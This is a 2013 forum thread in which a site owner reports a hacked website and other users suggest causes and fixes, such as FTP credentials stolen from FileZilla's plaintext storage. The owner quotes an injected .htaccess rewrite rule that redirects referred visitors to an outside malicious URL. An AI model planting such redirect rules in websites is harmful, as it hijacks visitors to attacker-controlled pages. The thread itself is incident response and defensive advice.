Posts: 15
Threads: 5
Joined: Oct 2012
hi all
My website
http://cycling-jersey-collection.com/
stopped working overnight, and after looking at at the files on the server there was .htaccess files in every directory.
Here's some of the code that was in the .htaccess files
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+) RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC] RewriteRule ^.*$
http://medlab-pdm.de/mchd.html?h=1393979 [L,R] </IfModule>
I have now removed them all, and have re-uploaded my "proper" .htaccess file too.
Has anybody else encountered this and do anyof you have any suggestions to stop it happening again.
Many thanks
Andy
Posts: 1,129
Threads: 137
Joined: Feb 2012
2013-02-06, 22:23:18
(This post was last modified: 2013-02-06, 22:29:23 by Timbow.)
Your site is not fixed
Redirected to this.
Redirecting to google now
Posts: 6,266
Threads: 181
Joined: Sep 2011
Get copies of your accesslogs ASAP.
Posts: 15
Threads: 5
Joined: Oct 2012
somehow they accessed the site via ftp despite me having a long, non-english word password with caps and numbers!
i've now blocked both IP address at the firewall.
Posts: 2,928
Threads: 195
Joined: Feb 2011
andy,
did you contact your hoster? They should protect the systems better...
Posts: 1,204
Threads: 30
Joined: Jun 2010
(2013-02-06, 22:11:55)andy.storey Wrote: Has anybody else encountered this and do anyof you have any suggestions to stop it happening again.
If you store unencrypted passwords in FTP app you use, infection might happen again. The same goes to all other users also having ftp accounts, and store them unencrypted. Their computers might be infected with a virus.
I suggest changing ftp passwords asap, and encrypt them or not store them at all. The same goes to main hosting account pass, if it's also used to connect to FTP.
Of course infection could happen through a security hole in another webapp or its plugin.
Addons: blue business theme, Online Visitors, Notepad
Posts: 15
Threads: 5
Joined: Oct 2012
thanks yojoe
i've changed the cPanel and ftp passwords to 2 different passwords.
I've also changed FTP programmes (was using filezilla) and will no longer "Save Passwords" in the new FTP prog.
a.
Posts: 1,204
Threads: 30
Joined: Jun 2010
saved ftp pass in filezilla ? :\
This app is a nightmare. At least you know the way of infection.
ps. Rescan your PC with AV software, might be even online
You may find links to usefeul scanners on this page:
http://www.itsecurity.com/features/free-...ls-101207/
Addons: blue business theme, Online Visitors, Notepad
Posts: 687
Threads: 63
Joined: Nov 2011
(2013-02-07, 00:29:19)Connie Wrote: andy,
did you contact your hoster? They should protect the systems better...
Oh yeah because a user using insecure software on this computer and getting compromised is really the fault of the hosting company?
Posts: 687
Threads: 63
Joined: Nov 2011
(2013-02-07, 03:33:29)yojoe Wrote: saved ftp pass in filezilla ? :\
This app is a nightmare. At least you know the way of infection.
ps. Rescan your PC with AV software, might be even online
You may find links to usefeul scanners on this page: http://www.itsecurity.com/features/free-...ls-101207/
This.
I highly recommend you scan the computer with Malwarebytes Anti-Malware Free Edition. It's a great scanner (not pro active Anti-virus protection)...
Posts: 6,266
Threads: 181
Joined: Sep 2011
What's wrong with FileZilla? Surely it safely stores passwords. No?
Posts: 687
Threads: 63
Joined: Nov 2011
2013-02-07, 14:50:50
(This post was last modified: 2013-02-07, 14:52:06 by shovenose.)
(2013-02-07, 12:49:36)shawn_a Wrote: What's wrong with FileZilla? Surely it safely stores passwords. No?
Stored in plaintext!
Go to C:\Users\Michel\AppData\Roaming\FileZilla in Windows, open recentservers.xml and sitemanager.xml all of your usernames, passwords, hostnames, ips, etc. are in there, unencrypted!
Posts: 6,266
Threads: 181
Joined: Sep 2011
Posts: 1,204
Threads: 30
Joined: Jun 2010
shawn: filezilla never had a way to encrypt stored passwords, thus I always advised against using it.
I suggest using unreal commander (with a free licence) as it allows to encrypt with main pass or with systemID and main pass. There's also "freecommander" but I haven't tested its FTP capabilities.
btw. infections through FTP happens pretty often.
At least browsers and search engines warn visitors when they enter an infected website.
Addons: blue business theme, Online Visitors, Notepad
Posts: 2
Threads: 0
Joined: Feb 2013
So far I can only suspect that FTP passwords were somehow intercepted and suggest that you use SFTP instead of FTP if your hosting plan provides SFTP access.